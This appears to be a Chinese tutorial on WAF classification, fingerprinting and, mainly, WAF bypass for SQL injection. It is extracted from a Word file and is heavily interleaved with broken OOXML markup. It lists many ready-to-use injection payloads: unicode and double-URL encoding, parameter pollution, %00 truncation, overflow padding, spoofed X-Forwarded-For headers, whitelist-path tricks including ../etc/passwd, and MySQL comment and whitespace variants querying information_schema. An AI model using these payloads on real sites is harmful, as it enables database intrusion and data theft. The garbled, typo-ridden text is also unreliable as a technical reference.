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Web应用防护系统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(也称为:网站应用级入侵防御系统。英文:Web Application Firewall，简称:WAF)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利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。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一、常见的WAF分类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把WAF分为4类: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云WAF类、硬件WAF类、软件WAF类、网站内置WAF类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1、云waf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安全宝创宇盾、玄武盾、腾讯云、百度云、西部数码、阿里云盾、奇安信网站卫士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2、软件WAF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D盾:http://www.d99net.net/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云锁:https://yunsuo.qianxin.com/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网防:http://www.weishi110.cn/static/index.html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安全狗:https://www.safedog.cn/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护卫神:https://www.hws.com/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智创:https://www.zcnt.com/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悬镜:https://www.xmirror.cn/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UPUPW:https://www.upupw.net/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WTS-WAF:https://www.west.cn/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安骑士:https://help.aliyun.com/product/28449.htm!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dotDefender: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.applicure.com/Products/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://www.applicure.com/Products/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minor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3、硬件WAF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绿盟:https://www.nsfocus.com.cn/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安恒:https://www.dbappsecurity.com.cn/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铱(yi)迅:https://www.yxlink.com/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天融信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深信服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启明星辰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知道创宇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F5 BIG-IP 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"https://www.f5.com/"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5"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.f5.com/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4、网站内置WAF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在搭建网站的时候，有很多企业会选择自己写过滤的规则。那么这种绕过的姿势就需要根据网站的过滤规则来尝试了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WAF比较常见的监测机制特点有以下几种。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异常检测协议:拒绝不符合HTTP标准的请求，也可以只允许符合HTTP协议的部分选项通过，也有一些web应用防火墙还可以限定http协议中那些过于松散或未被完全制定的选项。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(2)增强输入验证:增强输入验证，对恶意字符进行拦截。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(3)及时补丁:及时屏蔽掉新型漏洞，避免攻击者进行攻击，主要依靠WAF厂商对新型漏洞的及时响应速度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(4)基于规则的保护和基于异常的保护:基于规则的保护可以提供各种web应用的安全规则，waf生产商会维护这个规则库，并及时为其更新。用户可以按照这些规则对应用进行全方面检测。还有的产品可以基于合法应用数据建立模型，并以此为依据判断应用数据的异常。但这需要对用户企业的应用具有十分透彻的了解才可能做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(5)状态管理;能够判断用户是否是第一次访问，将请求重定向到默认登录页面并且记录事件，或对暴力破解行为进行拦截。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(6)其他防护技术:如隐藏表单域保护、抗入侵规避技术、响应监视和信息泄露保护。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(7)配置规则:可以自定义防护的规则，如是否允许“境外ip”的访问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二、WAF的识别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WAF绕过不仅要了解WAF检查的原理，还需要识别是什么类型的WAF，不同类型，不同品牌的waf监测机制不一样，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绕过的方式也不同。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识别的工具有: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Nmap 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Nmap识别waf命令 nmap -p 80 --script http-waf-fingerprint 网址或者nmap -p 80 --script http-waf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 xml:space="preserve">detect.nse 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"http://www.baidu.com"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15"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>www.baidu.com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Wafw00f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这款工具可以识别很多厂家的web防火墙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Wafw00f加网址即可识别。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除了根据工具来识别waf以外还可以根据拦截信息来识别 waf.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常见WAF拦截页面：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"https://www.freebuf.com/articles/web/265293.html"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15"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.freebuf.com/articles/web/265293.html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WAF Bypass技巧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第一章:WAF Bypass技巧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我们一般将安全防护软件划分为:云WAF、硬件waf、主机防护软件、软件waf等。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在攻防实战中，我们往往需要掌握一些特性，比如服务器、数据库、编程语言等等，以便更灵活地去构造Payload，从而绕过安全防护进行漏洞利用。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第一节:服务器特性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1、%特性(ASP+</w:t>
      </w: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IS)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在asp+</w:t>
      </w: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is的环境中存在一个特性，就是特殊符号%，在该环境下当们我输入s%elect的时候，在WAF层可能解析出来的结果就是s%elect，但是在iis+asp的环境的时候，解析出来的结果为select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Ps.此处猜测可能是iis下asp.d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解析时候的问题，aspx+iis的环境就没有这个特性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2、%u特性(asp+iis和aspx+iis)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器支持对于unicode的解析，例如我们对于select中的字符进行unicode编码，可以得到如下的s%u006c%u0006ect ，这种字符在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>II</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>S接收到之后会被转换为select，但是对于WAF层，可能接收到的内容还是s%u006c%u0006ect，这样就会形成bypass的可能。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3、另类%u特性(ASP+IIS)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该漏洞主要利用的是unicode在iis解析之后会被转换成multibyte，但是转换的过程中可能出现:多个widechar会有可能转换为同一个字符。打个比方就是譬如select中的e对应的unicode为%u0065，但是%u00f0同样会被转换成为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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s%u00651ect-&gt;select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>s%u00f01ect-&gt;select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WAF层可能能识别s%u0065lect的形式，但是很有可能识别不了s%u00f0lect的形式。这样就可以利用起来做WAF的绕过。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常见三个关键字(union+select+from)的测试情况,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s%u0Q451ect=s%u00651ect =%u00f01ect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u--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%u0055 --&gt;%u0075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n--&gt;%u004e --&gt;%u006e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i--&gt;%u0049 --&gt;%u0069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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--&gt;%u004f--&gt;%u006f--&gt;%u00ba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en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--&gt;%u0053--&gt;%u0073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--&gt;%u004c --&gt;%u006c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default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--&gt;%u0045 --&gt;%u0065--&gt;%u00f0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default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--&gt;%u0043--&gt;%u0063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t--&gt;%u0054--&gt;%u0074--&gt;%u00de --&gt;%u00fe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f--&gt;%u0046--&gt;%u0066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r--&gt;%u0052--&gt;%u0072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m--&gt;%u004d--&gt;%u006d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4、apache畸形method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在GET请求中，GET可以替换为任意参数名字，不影响apahce接收参数id=2.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数据包：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TEST /sq1.php?id=1HTTP/1.1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Host:127.0.0.1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User-Agent: Mozi1la/5.0 (windows NT 10.0; WOW64;rv:48.0)Gecko/20100101 Firefox/48.0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Accept: text/htm1,application/xhtm1+xm1,application/xm1;q=0.9,*/*;9=0.8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Accept-Language:zh-CN,zh;q=0.8,en-us;q=0.5,en;q=0.3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Accept-Encoding:gzip,deflate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connection:close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Upgrade-Insecure-Requests:1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第二节:应用层特性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1、大小写/关键字替换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这是最简单的绕过技术，用来绕过只针对特定关键字，大小写不敏感。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id=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 xml:space="preserve"> un</w:t>
      </w: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oN/**/seLecT 1,user()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将关键字进行等价替换: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Hex()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bin()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等价于ascii()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eep()等价于benchmark()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Mid()substring()等价于substr()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@@user 等价于 User()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@@version 等价于version()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双重url编码 双重ur编码，即对客户端发送的数据进行了两次uriencode操作，如s做一次u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编码是%73,再进行一次编码是%25%37%33。一般情况下在代码层默认做一次u解码，这样解码之后的数据一般不会匹配到规则，达到了bypass的效果。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（服务器端必须经过两次url解码）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编码方式，如char或Hex编码、Unicode编码、BASE64编码等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3、变换请求方式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将GET变成POST提交，或者POST请求将urlencode和form-data转换。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在POST请求中，可以将Post数据包转为上传multipart/fom-data格式数据包。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构造参数提交代码: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action="http://192.168.204.128/test.php"method="post" enctype="multipart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/form-data"&gt;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type="text" name="id"&gt;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type="submit"&gt;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转化为各种请求方式和请求体数据转换：（文件上传数据包格式）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5420" cy="2374265"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="1" name="图片 1" descr="屏幕截图 2025-01-14 224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1-14 224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------WebkitFormBoundaryAcZoaLJJzUwc4hYM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Content-Disposition:form-data; name="id"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information_schema.SCHEMATA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------WebkitFormBoundaryACZoaLJJzUwc4hYM--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4、HPP参数污染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类似?id=1&amp;id=2&amp;id=3的形式，此种形式在获取id值的时候不同的web技术获取的值是不一样的。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假设提交的参数即为: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id=1&amp;id=2&amp;id=3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得到的结果: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Asp.net + iis:id=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,2,3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Asp + iis:id=1,2,3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Php + apache:id=3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多种变形:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   （&amp;：多个参数连接符号）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MSSQL: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大小写:?id=1 UNON/*&amp;ID=*/SELECT 1,2/*&amp;Id=*/FROM ADMIN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GET+POST形式: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http://192.168.125.140/test/sq1.aspx?id=l union/*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post:id=2*/select nu11,nu11,nu11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利用逗号:?id=1 union select 1&amp;id=2&amp;id=3&amp;id=4 from admin--(无逗号形式)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?a=1+union/*&amp;b=*/select+l,pass/*&amp;c=*/from+users--(分割参数注入)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无效参数形式:?a=/*&amp;sq1=xxx&amp;b=*/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备注:a,b为无效参数，让waf误以为我们输入的语句是在注释符里面执行的所以就不拦截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溢出形式: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?id=1/*&amp;id=*//*&amp;id=*//*......&amp;id=*//*&amp;id=*/union select nu1l,system_user,nu17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INFORMATION_SCHEMA.schemata</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2318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Mysq</w:t>
      </w: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（溢出MySQL识别最后一个参数，MySQL特性）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?id-1&amp;id=i&amp;id=1&amp;id=1&amp;id=1&amp;id=1&amp;id=1&amp;id.... &amp;id=l union select 1,2 from admin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宽字节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宽字节关键字对照表：（实际比较少）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1136650"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="2" name="图片 2" descr="屏幕截图 2025-01-14 225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1-14 2252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第三节:WAF 层特性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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逻辑问题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(1)云waf防护，一般我们会尝试通过查找站点的真实IP，从而绕过CDN防护。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(2)当提交GET、POST同时请求时，进入POST逻辑，而忽略了GET请求的有害参数输入,可轻易Bypass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(3)HTTP和HTTPS同时开放服务，没有做HTTP到HTTPS的强制跳转，导致HTTPS有WAF防护，HTTP没有防护，直接访问HTTP站点绕过防护。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(4)特殊符号%00，部分waf遇到%00截断，只能获取到前面的参数，无法获取到后面的有害参数输入，从而导致Bypass。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id=1%00and 1=2 union select 1,2,column_name from information_schema.columns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2、性能问题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猜想1:在设计WAF系统时，考虑自身性能问题，当数据量达到一定层级，不检测这部分数据。只要不断的填充数据，当数据达到一定数目之后，恶意代码就不会被检测了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猜想2:不少WAF是C语言写的，而C语言自身没有缓冲区保护机制，因此如果WAF在处理测试向量时超出了其缓冲区长度就会引发bug，从而实现绕过。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列如：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?id=1 and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(select 1)=(select 0xA*1000)+UnIoN+SeLecT+1,2,version(),4,5,database(),user(),8,9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PS:0xA*1000指0xA后面”A"重复1000次，一般来说对应用软件构成缓冲区溢出都需要较大的测试长度，这里1000只做参考也许在有些情况下可能不需要这么长也能溢出。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列题2：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">?a0=0&amp;a1=1&amp;.....&amp;a100=100&amp;id=1 union select 1,schema_name,3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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>om</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> INFORMATION_SCHEMA.schemata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备注:获取请求参数，只获取前100个参数，第101个参数并没有获取到，导致SQL注入绕过。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猜想3:多次重复提交同一个请求，有些通过了WAF，有些被WAF所拦截了，应该性能问题导致部分请求bypass。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3、白名单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方式一:IP白名单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从网络层获取的ip，这种一般伪造不来，如果是应用层的获取的IP，这样就可能存在伪造白名单IP造成bypass.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测试方法:修改http的header来bypass waf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X-forwarded-for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X-remote-IP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X-originating-IP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x-remote-addr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x-Real-ip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方式二:静态资源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特定的静态资源后缀请求，常见的静态文件(.js jpg.swf .css等等)，类似白名单机制，waf为了检测效率，不去检测这样一些静态文件名后缀的请求。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"http://10.9.9.201/sq1.php/1.js?id=1"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15"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://10.9.9.201/sq1.php/1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>js?id=1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   (直接绕过1.js识别?id=1语句)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备注:Aspx/php只识别到前面的.aspx/.php 后面基本不识别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方式三:url白名单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为了防止误拦，部分waf内置默认的白名单列表，如admin/manager/system等管理后台。只要ur中存在白名单的字符串，就作为白名单不进行检测。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常见的ur构造姿势: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http://10.9.9.201/sq1.php/admin.php?id=1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http://10.9.9.201/sq1.php?a=/manage/&amp;b=../etc/passwd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"http://10.9.9.201/../../../manage/../sq1.asp?id=2"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15"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://10.9.9.201/../../../manage/../sq1.asp?id=2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waf通过/manage/"进行比较，只要uri中存在/manage/就作为白名单不进行检测，这样我们可以通过/sql.php?a=/manage/&amp;b=../etc/passwd 绕过防御规则。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方式四:爬虫白名单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部分wa有提供爬虫白名单的功能，识别爬虫的技术一般有两种:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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根据UserAgent2、通过行为来判断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UserAgent可以很容易欺骗，我们可以伪装成爬虫尝试绕过。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 Agent Switcher (Firefox附加组件)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下载地址: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/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火狐插件安装完成后，按下ALT键，调出工具栏，伪造爬虫。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第四节:数据库特性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第一篇:Mysql数据库特性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0x01 前言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我们经常利用一些数据库特性来进行WAF绕过。在Mysql中，比如可以这样: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内联注释：/*44444union*/数字固定是5位，当前MySQL版本大于4.44版本的时候可以执行。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MySQL黑魔法：select{x username(字段名)}from{x users(表名)}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换行符绕过：select * from users where id = -1/**/union #(换行符)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1,2,3;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055" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="屏幕截图 2025-01-14 231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1-14 2317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0x02 测试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常见有5个位置即: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* FRoM admin WHERE username = 1【位置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default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>】union【位置二】select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【位置三】1,user()【位置四)from【位置五】admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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位置一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:参数和union之间的位置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(1)常见形式:/**/、/*!50000union*/等形式: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* FRoM admin WHERE username = 1 union/**/select 1,user() from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin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(2)空白字符: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Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0;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id=1%0aunion select 1,user()from admin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其他形式如:%1%20、%3920、%40%20、%23%0a、%2d%2d%0a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(3)浮点数形式:1.1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* FRoM admin WHERE username = 1.0union select 1,user()from admin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* FRoM admin WHERE username = 1.union select 1,user() from admin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其他形式如:%1%2e、%2%2e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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(4)1E0的形式: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SELECT *FRoM admin WHERE username = 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E0union select 1,user() from admin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位置二:union和select之间的位置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空白字符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Mysq1中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d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%20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%a0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id=1 union%a0select 1,user()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from admin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(2)注释符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使用空白注释，MYSQL中可以利用的空白字符有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/**/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&amp;*anythig*/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(3)括号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SELECT*FROM admin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WHERE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username=1 union(select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'test',(selectuser()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from admin limit 0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1))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* from admin union(select 'test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">,(select 'asd'),(select user() from users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limit 0, 1))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位置三:select和查询参数之间的位置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(1)空白字符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Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0: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id=1 union select%091,user() from admin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(2)注释符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使用空白注释，MYSQL中可以利用的空白字符有:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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/**/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&amp;*anythig*/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其他字符：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%21 ！感叹号     %2b  +  加号    %2d -  减号  %40 @ 电子邮件符号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%7e ~ 波浪号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构造语句：select * from users where id=-1/*/union select~(!/+/-/@)1,username,3 from users;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(4)其他方式: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括号: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* FROM admin WHERE username = 1 union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select(1),user() from admin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内联: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* FROM admin WHERE username = 1 union /!12345se</w:t>
      </w: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ect/1,user() from admin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@字符:SELECT * FROM admin WHERE username = 1 union select@ 1,user() from admin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(括号:SELECT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FROM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admin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WHERE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username=1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union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select{x1},user() from admin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引号:SELECT * FROM admin WHERE username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> =1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>union select"1",user() from admin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N: SELECT * FROM admin WHERE userame = 1 union select</w:t>
      </w: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N,user() from admin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位置四:查询参数和from之间的位置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(1)空白字符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Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0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id=1 union select 1,user()%09from admin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注释符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使用空白注释，MYSQL中可以利用的空白字符有</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"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/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/*anything*/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(3)其他符号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波浪号%60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SELECT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FROM admin WHERE userame =1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union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(select 1,(select schema_name from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information schema.SCHEMATA limit 0,1))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* FROM admin WHERE username = 1 union select 1,user()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>from admin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内联注释:SELECT*FROM admin WHERE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username =1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union(select 1,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(select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>name/from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> information_scheam.schemata limit 1,1))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双引号：select * from admin where username = 1 union select 1 user()""from admin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()A：select * from admin where username = 1 union select 1 user()A from admin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位置五:from后面的位置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(1)空白字符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Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0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id=1 union select 1,user()%09from admin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(2)注释符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使用空白注释，MYSQL中可以利用的空白字符有:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="1200" w:firstLineChars="5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/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/*anything*/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其他字符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破浪号:id=1 union select 1,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(select(schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>name)from information_schema .SCHEMATA limit 0,1)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内联注释：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>id=1 union select 1,(select(schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>name)from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
